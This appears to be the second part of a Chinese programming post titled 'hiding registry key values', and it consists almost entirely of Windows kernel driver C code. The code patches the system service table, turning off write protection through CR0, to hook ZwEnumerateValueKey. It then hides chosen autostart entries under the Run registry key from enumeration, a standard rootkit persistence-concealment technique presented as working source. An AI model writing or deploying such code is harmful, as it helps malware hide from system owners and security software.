隐藏注册表的键值(2)

status=((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
pKey=GetPointer(KeyHandle); 

if (pKey)
{
pUniName=ExAllocatePool(NonPagedPool,1024*2);
pUniName->MaximumLength=512*2;
memset(pUniName,0,pUniName->MaximumLength);
if(NT_SUCCESS(ObQueryNameString(pKey,pUniName,512*2,&actuallen)))
{
RtlUnicodeStringToAnsiString(&keyname,pUniName,TRUE);   

DbgPrint("%ws ",pUniName->Buffer); 
keyname.Buffer=_strupr(keyname.Buffer);

if (strcmp(keyname.Buffer,"\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")==0)
{
ValueName =((PKEY_VALUE_FULL_INFORMATION)KeyValueInformation)->Name; 
if (ValueName!=NULL&&wcsstr(ValueName,HideValue)!=NULL)
{
Index++;
ValueName=NULL;
return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
}
//DbgPrint("ValueName=%ws ",ValueName); 

}
}
}

return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);

}

NTSTATUS HookApi()
{
RealZwEnumerateValueKey = (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey);
_asm{
mov eax,cr0
and eax,not 10000h
mov cr0,eax
}

(REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey)=MyZwEnumerateValueKey;
_asm{

mov eax,cr0
or eax,10000h
mov cr0,eax
}
return( STATUS_SUCCESS );
}

NTSTATUS UnHook()
{
_asm{
mov eax,cr0
and eax,not 10000h
mov cr0,eax
}
(REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey) = RealZwEnumerateValueKey;
_asm{ 

mov eax,cr0
or eax,10000h
mov cr0,eax
}
return STATUS_SUCCESS ;
} 

NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
NTSTATUS status;
DbgPrint("OnUnload called! ");
status=UnHook();
return status;
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
IN PUNICODE_STRING theRegistryPath)
{

theDriverObject->DriverUnload=DriverUnload;
HookApi();
DbgPrint("Hook Called! ");
return STATUS_SUCCESS ;
}